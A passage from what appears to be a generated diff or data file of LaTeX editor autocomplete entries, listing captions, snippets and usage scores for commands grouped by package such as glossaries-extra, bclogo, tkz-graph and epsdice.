'\\Tilde{$1}', + meta: 
'glossaries-extra-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'glossaries-extra-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'glossaries-extra-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'glossaries-extra-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'glossaries-extra-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'glossaries-extra-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'glossaries-extra-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'glossaries-extra-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'glossaries-extra-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'glossaries-extra-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'glossaries-extra-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'glossaries-extra-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'glossaries-extra-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'glossaries-extra-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'glossaries-extra-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'glossaries-extra-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'glossaries-extra-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'glossaries-extra-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'glossaries-extra-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'glossaries-extra-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'glossaries-extra-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'glossaries-extra-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'glossaries-extra-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'glossaries-extra-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'glossaries-extra-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 
'glossaries-extra-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'glossaries-extra-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'glossaries-extra-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'glossaries-extra-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'glossaries-extra-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'glossaries-extra-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'glossaries-extra-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'glossaries-extra-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'glossaries-extra-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'glossaries-extra-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'glossaries-extra-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'glossaries-extra-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'glossaries-extra-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'glossaries-extra-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'glossaries-extra-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'glossaries-extra-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'glossaries-extra-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'glossaries-extra-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'glossaries-extra-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'glossaries-extra-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'glossaries-extra-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-extra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'glossaries-extra-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'glossaries-extra-cmd', + score: 0.18137737738638837, + }, + { + 
caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'glossaries-extra-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'glossaries-extra-cmd', + score: 2.341195220791228, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'glossaries-extra-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'glossaries-extra-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'glossaries-extra-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'glossaries-extra-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-extra-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'glossaries-extra-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-extra-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: 
'\\noexpand', + meta: 'glossaries-extra-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'glossaries-extra-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-extra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'glossaries-extra-cmd', + score: 0.0063276692758974925, + }, + ], + dashrule: [ + { + caption: '\\hdashrule[]{}{}{}', + snippet: '\\hdashrule[$1]{$2}{$3}{$4}', + meta: 'dashrule-cmd', + score: 0.00029867998381154486, + }, + ], + bclogo: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bclogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'bclogo-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'bclogo-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bclogo-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'bclogo-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'bclogo-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'bclogo-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'bclogo-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'bclogo-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bclogo-cmd', + score: 
0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'bclogo-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'bclogo-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bclogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bclogo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bclogo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'bclogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'bclogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'bclogo-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bclogo-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'bclogo-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bclogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'bclogo-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'bclogo-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'bclogo-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'bclogo-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'bclogo-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bclogo-cmd', + score: 
0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + ], + isomath: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'isomath-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'isomath-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'isomath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'isomath-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'isomath-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'isomath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'isomath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'isomath-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'isomath-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'isomath-cmd', + score: 0.021170869458413965, + }, + ], + 'tkz-graph': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-graph-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-graph-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-graph-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-graph-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-graph-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-graph-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tkz-graph-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-graph-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + 
snippet: '\\ifthenelse{$1}', + meta: 'tkz-graph-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tkz-graph-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tkz-graph-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tkz-graph-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-graph-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-graph-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-graph-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-graph-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-graph-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-graph-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-graph-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-graph-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-graph-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-graph-cmd', + score: 0.2864294797053033, + }, + ], + sourcesanspro: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'sourcesanspro-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 
'sourcesanspro-cmd', + score: 0.008565354665444157, + }, + ], + longdivision: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'longdivision-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'longdivision-cmd', + score: 0.2864294797053033, + }, + ], + xmpmulti: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xmpmulti-cmd', + score: 0.00037306820619479756, + }, + ], + epsdice: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsdice-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'epsdice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'epsdice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'epsdice-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'epsdice-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'epsdice-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epsdice-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'epsdice-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsdice-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'epsdice-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'epsdice-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + 